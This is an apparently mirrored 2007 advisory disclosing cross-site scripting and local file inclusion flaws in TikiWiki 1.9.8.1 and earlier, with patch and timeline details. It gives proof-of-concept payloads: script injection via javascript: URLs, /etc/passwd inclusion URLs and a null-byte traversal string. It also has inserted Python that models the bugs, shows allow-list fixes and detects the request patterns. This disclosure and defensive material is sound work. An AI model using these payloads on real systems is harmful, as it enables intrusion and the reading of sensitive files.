SECURITYVULNS:DOC:18292
Oct 26, 2007 - 12:00 a.m.

TikiWiki <= 1.9.8.1 Cross Site Scripting / Local File Inclusion

2007-10-26 00:00:00
vulners.com
======================================================================
TikiWiki <= 1.9.8.1 Cross Site Scripting / Local File Inclusion

Author: L4teral <l4teral [4t] gmail com>
Impact: Cross Site Scripting / Local File Inclusion
Status: patch available


Affected software description:

Application: TikiWiki
Version: <= 1.9.8.1
Vendor: http://tikiwiki.org

Description:
TikiWiki (Tiki) is your Groupware/CMS (Content Management System) solution.


Vulnerability:

XSS:

  1. The password reminder page (tiki-remind_password.php) reflects the
     submitted username into the response without HTML encoding.

  2. Script code can be embedded into wiki pages: the {img} plugin accepts
     a javascript: URL as its src attribute.

  3. The script db/tiki-db.php is vulnerable to cross site scripting
     (reached through tiki-index.php, parameter local_php).

LFI:

  4. The script db/tiki-db.php is vulnerable to local file inclusion
     (parameters error_handler_file and local_php; requires
     register_globals).

  5. The script tiki-imexport_languages.php is vulnerable to local file
     inclusion (parameter imp_language; requires the lang_use_db
     feature).


PoC/Exploit:

XSS:

  1. Enter in the form: <img src="javascript:alert(document.cookie)">

     URL: http://localhost/tikiwiki/tiki-remind_password.php
     POSTDATA: username=%3Cimg+src%3D%22javascript%3Aalert%28document.cookie%29%3B%22%3E
               remind=send+me+my+password

  2. Create a wiki page containing:
     {img src=javascript:alert(document.cookie) }

     (Items 1 and 2 rely on the browser executing a javascript: URL in an
     image source, which the browsers of the period did; current browsers
     refuse it, but the missing encoding and the unrestricted src remain
     injection points for other payloads.)

  3. http://localhost/tikiwiki/tiki-index.php?local_php=<script>alert(document.cookie)</script>
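The fix for items 1 and 2 is an allow-list on the scheme of a user-supplied image URL plus HTML encoding of anything reflected into the page. The following is an added example written for this page, not code from the advisory or from TikiWiki; the allowed-scheme policy, the reminder message wording and all function names are assumptions, and the inputs fed to it are constructed from the advisory's payloads plus the usual encoding tricks used to get past a plain substring check.

```python
"""Added example, not code from the advisory or from TikiWiki: the scheme
check the {img src=...} wiki plugin needs, and the output escaping the
password-reminder page lacks. The allowed-scheme policy, the message
wording and all function names are assumptions."""
import html
import re
import urllib.parse

ALLOWED_SCHEMES = {"http", "https"}           # assumed site policy
_SCHEME = re.compile(r"([a-zA-Z][a-zA-Z0-9+.\-]*):")


def normalize_url(url):
    """Undo the encodings used to slip 'javascript:' past a substring
    check: HTML entities, percent-encoding, and the control/whitespace
    bytes that browsers of the period ignored inside a scheme."""
    s = html.unescape(url)
    s = urllib.parse.unquote(s)
    return re.sub(r"[\x00-\x20]", "", s)


def is_safe_image_src(url):
    """Allow relative URLs and the allow-listed schemes only; everything
    else (javascript:, data:, vbscript:, scheme-relative //host) is out."""
    s = normalize_url(url)
    m = _SCHEME.match(s)
    if m is None:
        return not s.startswith("//")
    return m.group(1).lower() in ALLOWED_SCHEMES


def render_img_plugin(src):
    """Rendering for {img src=...}: refuse unsafe sources, and HTML-escape
    the attribute value so the src cannot break out of the tag."""
    if not is_safe_image_src(src):
        return '<span class="error">img: source not allowed</span>'
    return '<img src="%s">' % html.escape(src, quote=True)


def reminder_message_vulnerable(username):
    """The pattern behind PoC item 1: the submitted name echoed back raw."""
    return "A reminder was sent for user %s." % username


def reminder_message_fixed(username):
    """Same message with the value escaped for an HTML text context."""
    return "A reminder was sent for user %s." % html.escape(username, quote=True)


if __name__ == "__main__":
    # Constructed inputs: the advisory's payload plus common obfuscations.
    for src in ("javascript:alert(document.cookie)",
                "JaVaScRiPt:alert(1)",
                "java\tscript:alert(1)",
                "&#106;avascript:alert(1)",
                "%6Aavascript:alert(1)",
                "//evil.example/x.png",
                "http://example.org/a.png",
                "img/wiki_up/logo.png"):
        print("%-40r -> %s" % (src, render_img_plugin(src)))
    payload = '<img src="javascript:alert(document.cookie)">'
    print(reminder_message_vulnerable(payload))
    print(reminder_message_fixed(payload))
```

The check normalizes before matching because a filter that only looks for the literal string "javascript:" is defeated by a tab inside the word, an HTML entity for the first letter, or percent-encoding; allow-listing the scheme after normalization closes all of those at once, and the escaping in render_img_plugin is still needed so a permitted URL cannot inject a second attribute.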

LFI:

  4. register_globals must be enabled:
     http://localhost/tikiwiki/tiki-index.php?error_handler_file=/etc/passwd
     http://localhost/tikiwiki/tiki-index.php?local_php=/etc/passwd

  5. The feature lang_use_db (use database for translation) must be activated:
     URL: http://localhost/tikiwiki/tiki-imexport_languages.php
     POSTDATA: imp_language=…%2F…%2F…%2F…%2F…%2Fetc%2Fpasswd%00&import=import

     The trailing %00 truncates the file name that the script appends to
     the language code; this only works on PHP builds that still accept
     NUL bytes in file paths (PHP rejects them from 5.3.4 on).
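To make the two LFI mechanisms concrete, here is an added example written for this page, not code from the advisory or from TikiWiki. It models what include() ends up opening for each PoC, shows the allow-list that closes the language import, and adds a small log check for the request shapes above. The install path, the lang/<code>/language.php layout, the default error-handler file name and all function names are assumptions, and the request bodies it uses are constructed (five "../" steps followed by the NUL byte, as in PoC item 5).

```python
"""Added example, not code from the advisory or from TikiWiki: a model of
how the two local-file-inclusion vectors reach the filesystem, the
allow-list that closes the language import, and a log check for the
advisory's request shapes. Install path, lang/ layout, the default
handler file name and all function names are assumptions."""
import posixpath
import re
import urllib.parse

WEBROOT = "/var/www/tikiwiki"        # assumed install path
LANG_DIR = WEBROOT + "/lang"         # assumed: lang/<code>/language.php


def php_include_target(path, cwd=WEBROOT):
    """File that include($path) would open on the PHP of 2007: a relative
    path is resolved against the application root (modelled as cwd), and
    an embedded NUL byte truncates the string (PHP rejected NULs in file
    paths only from 5.3.4 on)."""
    path = path.split("\x00", 1)[0]
    if not path.startswith("/"):
        path = cwd + "/" + path
    return posixpath.normpath(path)


def include_error_handler(query_string):
    """register_globals vector (PoC item 4): every query parameter becomes
    a PHP global, so the uninitialised $error_handler_file the script later
    passes to include() is attacker-chosen. Default name is assumed."""
    params = dict(urllib.parse.parse_qsl(query_string, keep_blank_values=True))
    error_handler_file = params.get("error_handler_file", "lib/errorhandler.php")
    return php_include_target(error_handler_file)


def import_language_vulnerable(post_body):
    """tiki-imexport_languages vector (PoC item 5): the language code is
    glued between a directory and a fixed suffix; '../' climbs out of
    lang/ and the trailing NUL discards '/language.php'."""
    params = dict(urllib.parse.parse_qsl(post_body, keep_blank_values=True))
    code = params.get("imp_language", "")
    return php_include_target(LANG_DIR + "/" + code + "/language.php")


LANG_CODE = re.compile(r"[a-z]{2}(?:-[a-z]{2})?")   # assumed code format


def import_language_fixed(post_body):
    """Allow-list the code instead of stripping traversal sequences, then
    confirm the resolved path still lies inside LANG_DIR."""
    params = dict(urllib.parse.parse_qsl(post_body, keep_blank_values=True))
    code = params.get("imp_language", "")
    if not LANG_CODE.fullmatch(code):
        raise ValueError("invalid language code")
    target = posixpath.normpath(LANG_DIR + "/" + code + "/language.php")
    if not target.startswith(LANG_DIR + "/"):
        raise ValueError("path escapes lang directory")
    return target


def lfi_indicators(raw_query_or_body):
    """Access-log check: reasons a raw query string or POST body matches
    the advisory's LFI shapes, or an empty list."""
    decoded = urllib.parse.unquote(raw_query_or_body)
    reasons = []
    if "error_handler_file=" in decoded or "local_php=" in decoded:
        reasons.append("register_globals include override")
    if "../" in decoded or "..\\" in decoded:
        reasons.append("directory traversal")
    if "\x00" in decoded:
        reasons.append("null-byte truncation")
    if re.search(r"=(/etc/|/proc/)", decoded):
        reasons.append("absolute system path")
    return reasons


if __name__ == "__main__":
    # Constructed requests mirroring the advisory's PoC
    print(include_error_handler("error_handler_file=/etc/passwd"))
    body = "imp_language=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00&import=import"
    print(import_language_vulnerable(body))
    try:
        import_language_fixed(body)
    except ValueError as e:
        print("fixed:", e)
    print(lfi_indicators(body))
```

Two points worth noting from the model: the error_handler_file case needs no traversal at all, because with register_globals the attacker sets the variable that is passed to include() directly, so the real fix is initialising such variables before use (and turning register_globals off); and for the language import, an allow-list on the code is preferable to stripping "../", since a NUL byte or an encoding variant can survive a blacklist while it cannot match a two-letter code.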


Solution:

Update to 1.9.8.2 or later:
https://sourceforge.net/project/showfiles.php?group_id=64258&package_id=112134&release_id=549549


Timeline:

23.10.2007 - vendor informed
25.10.2007 - vendor released patch
25.10.2007 - public disclosure